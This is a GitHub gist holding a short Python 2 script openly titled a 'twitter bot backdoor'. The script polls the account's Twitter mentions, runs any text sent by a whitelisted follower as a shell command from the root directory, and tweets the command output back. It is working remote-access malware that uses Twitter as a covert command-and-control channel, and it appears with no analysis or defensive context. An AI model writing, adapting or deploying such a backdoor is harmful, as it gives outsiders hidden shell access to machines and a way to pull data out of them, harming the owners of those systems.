Created
February 1, 2012 05:10
-
-
Save jcande/1715235 to your computer and use it in GitHub Desktop.
twitter bot backdoor in python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python2 | |
| # TODO | |
| # Use a RESTful noun instead of just checking every n seconds | |
| # Save the last executed command's id so we don't repeat every startup | |
| # Use stderr (out + err, perhaps?) | |
| import twitter | |
| import time | |
| import sys | |
| from subprocess import Popen, PIPE, STDOUT | |
| def send(username, text, api): | |
| # maxLength - |@| - |username| - | | | |
| step = 140 - len(username) - 2 | |
| for i in range(0, len(text), step): | |
| status = "@%s %s" % (username, text[i:i + step]) | |
| #print status | |
| api.PostUpdate(status) | |
| # Tried using command.user in whitelist but it was comparing pointers, not | |
| # structure | |
| def contains(list, element): | |
| for x in list: | |
| if x.id == element.id: | |
| return True | |
| return False | |
| # Drop everything before, and including, the first space | |
| def drop_first(str): | |
| pos = str.find(' ') + 1 | |
| return str[pos:] | |
| # The message must contain our username first, the rest we pass to the shell | |
| def valid(name, command): | |
| chunks = command.split() | |
| to_user = chunks[0] | |
| # [1:] to skip the leading @ | |
| return to_user[1:] == name | |
| def forever(api): | |
| name = api.VerifyCredentials().screen_name | |
| whitelist = api.GetFollowers() # :: [twitter.Users] | |
| last_id = 0 | |
| while True: | |
| for command in api.GetMentions(): | |
| args = drop_first(command.text) | |
| if contains(whitelist, command.user) and valid(name, command.text) and last_id != command.id: | |
| #print "%s said: %s" % (command.user.screen_name, command.text) | |
| p = Popen(args, shell=True, stdout=PIPE, stderr=PIPE, cwd="/") | |
| (out, err) = p.communicate() | |
| send(command.user.screen_name, out, api) | |
| elif last_id != command.id: | |
| print "@%s attempted to run: %s" % (command.user.screen_name, args) | |
| last_id = command.id | |
| time.sleep(30) | |
| def main(): | |
| api = twitter.Api(consumer_key='', | |
| consumer_secret='', | |
| access_token_key='', | |
| access_token_secret='') | |
| if api.VerifyCredentials() is None or not api.GetFollowers(): | |
| print "We couldn't login or no friends. Game over, man! Game over!" | |
| sys.exit(1) | |
| else: | |
| forever(api) | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment